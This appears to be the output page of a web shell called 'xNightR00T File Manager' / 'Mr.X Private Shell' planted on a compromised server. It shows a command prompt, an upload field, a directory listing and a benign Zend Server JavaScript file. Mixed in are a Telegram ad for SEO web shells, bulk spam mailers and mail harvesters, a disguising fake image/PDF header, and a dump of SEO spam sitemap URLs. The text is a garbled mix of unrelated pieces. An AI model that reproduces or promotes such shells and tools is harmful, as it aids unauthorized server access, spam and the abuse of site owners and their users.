xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
var zgridServerDetails = new Class({
	Implements: [Events,Options],
	
	currentRow: '',
	currentId: 	0,
	spinner:	false,
	reload:		false,
	
	getOptions: function(){
		return {
			url: null
		};
	},
	
	initialize: function(options){
		this.setOptions(this.getOptions(), options);
	},
	
	onLoadData: function (data)
	{
		if (data) {
			var rowContent = this.getRow(data.responseData);
			$(this.currentRow).set('html', rowContent);
			
			var descContentDiv = $(this.currentRow).getElement('div');
			
			if (! this.reload) {
				var myVerticalSlide = new Fx.Slide(descContentDiv, {
					onComplete: function(){
						$(zgrid2.options.tableDescContent + this.currentId).spinner = new Spinner($(zgrid2.options.tableDescContent + this.currentId));
						if (this.spinner) {
							$(zgrid2.options.tableDescContent + this.currentId).spinner.show();
						}
				    }.bind(this)
				});
				myVerticalSlide.hide();
				myVerticalSlide.slideIn();
			} else {
				this.reload = false;
			}
		}
	},
	
	loadData: function(data)
	{
		if (!this.options.url)
			return;
		
		this.currentId = data.id;
		this.currentRow = data.rowId;
		if (data.spinner) {
			this.spinner = data.spinner;
		} else {
			this.spinner = false;
		}

		var params = {
			servers: [data.id]
		};
		
		var request = new Request.WebAPI({url: this.options.url, data:params});

		request.addEvent("complete", this.onLoadData.bind(this) ) ;

		request.get();
	}, 
	
	showSpinner: function(rowId) {
		$(zgrid2.options.tableDescContent + rowId).spinner.show();
	},
	
	hideSpinner: function(rowId) {
		$(zgrid2.options.tableDescContent + rowId).spinner.hide();
	},
	
	reloadData: function(data) {
		this.reload = true;
		this.loadData(data);
	},
	
	getRow: function(data) {
		var server = data.serversList[0];
		
		var template = '<div class="tableDescContent" id="tableDescContent_' + this.currentId + '">';
		
		var counter = 0;
		
		var parent = this;
		
		if (server.messageList.length == 0) {
			template += _t('No errors found');
		} else {
			template += '<ul>';
			server.messageList.each(function(item) {
				var key = Object.keys(item)[0];
				template += '<li>' + item[key] + '</li>';
			}.bind(this));
			template += '</ul>';
		}
		
		
		template += '<div class="clear"></div></div>';
		
		return template;
	},
	
	clean: function(value) {
		var cleaner = new Element('div');
		cleaner.set('text', value);
		
		return cleaner.get('html');
	},
	
	getCount: function(value) {
		if (value > 1000) {
			value = Math.floor(value / 1000) + "k";
		}
		return '<div class="issues-count-wrapper"><div class="issues-count">' + value + '</div></div>';
	},
	
	getFieldName: function(fieldType) {
		switch (fieldType) {
			case 'url': return 'URL';
			case 'function': return 'Function name';
			case 'customEventClass': return 'Class Name (custom)';
			case 'errorType': return 'Error Type';
			case 'sourceFile': return 'Source file';
			case 'errorString': return 'Error string';
			default: return '';
		}
	},
	
	getFields: function(eventType) {
		eventType = parseInt(eventType);
		switch (eventType) {
			case 0: // ZM_TYPE_CUSTOM
				return new Array('url', 'customEventClass', 'sourceFile', 'errorString');
			case 3: // ZM_TYPE_REQUEST_SLOW_EXEC
			case 4: // ZM_TYPE_REQUEST_RELATIVE_SLOW_EXEC
			case 5: // ZM_TYPE_REQUEST_LARGE_MEM_USAGE
			case 6: // ZM_TYPE_REQUEST_RELATIVE_LARGE_MEM_USAGE
			case 7: // ZM_TYPE_REQUEST_RELATIVE_LARGE_OUT_SIZE
				return new Array('url');
			case 2: // ZM_TYPE_FUNCTION_ERROR
			case 1: // ZM_TYPE_FUNCTION_SLOW_EXEC
				return new Array('url', 'function', 'sourceFile');
			case 8: // ZM_TYPE_ZEND_ERROR
				return new Array('url', 'function', 'errorType', 'sourceFile', 'errorString');
			case 9: // ZM_TYPE_JAVA_EXCEPTION
				return new Array('url', 'function', 'sourceFile', 'errorString');
			case 10: // ZM_TYPE_JQ_JOB_EXEC_ERROR
			case 11: // ZM_TYPE_JQ_JOB_LOGICAL_FAILURE
			case 12: // ZM_TYPE_JQ_JOB_EXEC_DELAY
			case 13: // ZM_TYPE_JQ_DAEMON_HIGH_CONCURRENCY_LEVEL
				return new Array('url');
			case 14: // ZM_TYPE_TRACER_FILE_WRITE_FAIL
				return new Array();
			case 16: // ZM_TYPE_ZSM_CONFIGUATION_MISMATCH
			case 17: // ZM_TYPE_ZSM_NODE_ADDED_SUCCESSFULLY
			case 19: // ZM_TYPE_ZSM_NODE_IS_NOT_RESPONDING
			case 18: // ZM_TYPE_ZSM_NODE_REMOVED_SUCCESSFULLY
			case 20: // ZM_TYPE_ZSM_NODE_DISABLED_SUCCESSFULLY
			case 21: // ZM_TYPE_ZSM_NODE_ENABLED_SUCCESSFULLY
			case 15: // ZM_TYPE_ZSM_RESTART_FAILED
				return new Array();
			case 24: // ZM_TYPE_DEPL_APP_DEPLOYED_ERROR
			case 23: // ZM_TYPE_DEPL_APP_DEPLOYED_SUCCESSFULLY
			case 28: // ZM_TYPE_DEPL_APP_REMOVED_ERROR
			case 27: // ZM_TYPE_DEPL_APP_REMOVED_SUCCESSFULLY
			case 26: // ZM_TYPE_DEPL_APP_RE_DEPLOYED_ERROR
			case 25: // ZM_TYPE_DEPL_APP_RE_DEPLOYED_SUCCESSFULLY
			case 30: // ZM_TYPE_DEPL_APP_UPDATE_ERROR
			case 29: // ZM_TYPE_DEPL_APP_UPDATE_SUCCESSFULLY
			case 32: // ZM_TYPE_DEPL_APP_ROLLBACKED_ERROR
			case 31: // ZM_TYPE_DEPL_APP_ROLLBACKED_SUCCESSFULLY
				return new Array('url');
			default:
				return new Array('url', 'function', 'errorType', 'sourceFile', 'errorString');
		}
	}
});

Filemanager

Name Type Size Permission Actions
ammap Folder 0755
datepicker Folder 0755
deploymentLibraries Folder 0755
devbar Folder 0755
highcharts Folder 0755
highcharts-new Folder 0755
highstock Folder 0755
monitor Folder 0755
plugins Folder 0755
simplemodal Folder 0755
uploader Folder 0755
FormWizard.js File 6.84 KB 0644
FragmentManager.js File 4.5 KB 0644
Fx.Scroll.Carousel.js File 2.84 KB 0644
Spinner.js File 11.52 KB 0644
TabPane.Extra.js File 1.36 KB 0644
TabPane.js File 2.46 KB 0644
ToolTip.js File 8.47 KB 0644
charts.js File 12.38 KB 0644
debuggerSettings.js File 6.98 KB 0644
defineWizard.js File 2.81 KB 0644
deploymentWizard.js File 5.04 KB 0644
ellipsis.js File 4.01 KB 0644
filter.js File 35.59 KB 0644
floatingtips.js File 8.88 KB 0644
general.js File 9.45 KB 0644
highlighter.js File 3.16 KB 0644
init.js File 5.76 KB 0644
integrateWizard.js File 2.13 KB 0644
ipwidget.js File 1.85 KB 0644
monitorRules.js File 699 B 0644
mootools-autocompleter-1.2.js File 11.67 KB 0644
mootools-more.js File 340.68 KB 0644
mootools.js File 143.5 KB 0644
onOffButton.js File 1.96 KB 0644
persistantHeaders.js File 7.28 KB 0644
placeholder.js File 970 B 0644
pluginDeploymentWizard.js File 3.58 KB 0644
plugins.js File 9.23 KB 0644
searchField.js File 3.16 KB 0644
toast.js File 8.41 KB 0644
valuesList.js File 1.74 KB 0644
version.js File 1.35 KB 0644
z-ray-libs.js File 543.21 KB 0644
z-ray-libs.min.js File 495.1 KB 0644
z-ray-libs.min.js.map File 594.33 KB 0644
zPicker.Date.js File 166 B 0644
zendcom.js File 5.35 KB 0644
zgrid.js File 14.99 KB 0644
zgrid2.js File 31.71 KB 0644
zgridApplicationInfo.js File 14.01 KB 0644
zgridAuditInfo.js File 4.89 KB 0644
zgridDirectives.js File 16.83 KB 0644
zgridEventDetails.js File 9.13 KB 0644
zgridJobDetails.js File 1.42 KB 0644
zgridLibraryDetails.js File 6.1 KB 0644
zgridPluginInfo.js File 6.96 KB 0644
zgridPolling.js File 2.14 KB 0644
zgridQueueDetails.js File 1.42 KB 0644
zgridServerDetails.js File 5.16 KB 0644
zgridVhostInfo.js File 12.79 KB 0644
zmenu.js File 6.12 KB 0644
zpager.js File 4.7 KB 0644
zsLicenseValidation.js File 2.34 KB 0644
zswebapi.js File 2.29 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml